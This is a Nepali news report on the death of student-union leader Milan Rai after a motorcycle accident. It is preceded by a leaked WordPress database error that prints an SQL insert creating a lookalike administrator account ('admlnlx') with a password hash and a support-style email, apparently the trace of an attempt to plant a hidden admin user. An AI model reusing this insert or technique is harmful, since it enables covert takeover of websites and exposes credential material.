WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BOKey8oqiNWse9Le4831IdmJgPD8L..', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 23:05:58', '', 'admlnlx', 'admlnlx')
खोटाङ, माघ २७–
मोटरसाइकल दुर्घटनामा परी गम्भीर घाइते बनेका अनेरास्ववियुका केन्द्रीय सदस्य मिलन राईको उपचारका क्रममा आज मृत्यु भएको छ ।
काठमाडौँबाट जन्मस्थान खोटाङ आउने क्रममा मङ्गलबार बिहान दुर्घटनामा परेका राईको उपचारका क्रममा आज अपराह्न मृत्यु भएको हो । सङ्गठनका काममा खोटाङ हिँडेका राई भक्तपुरमा मोटरसाइकल दुर्घटनामा परेको अनेरास्ववियुले जनाएको छ । दुर्घटनालगत्तै बेहोस बनेका राईको काठमाडौँस्थित न्युरो अस्पताल पुर्याएर सघन उपचार कक्षमा भर्ना गरिएको थियो ।
न्युरो अस्पतालमा उपचार सम्भव नभएपछि उनलाई काठमाडौँकै ट्रमा सेन्टर पुर्याइएको थियो । करिब एक दशकदेखि एमाले निकट विद्यार्थी सङ्गठनमा क्रियाशील राई सङ्गठनको माथिल्लो सगरमाथा प्रमुखसमेत हुनुहुन्थ्यो ।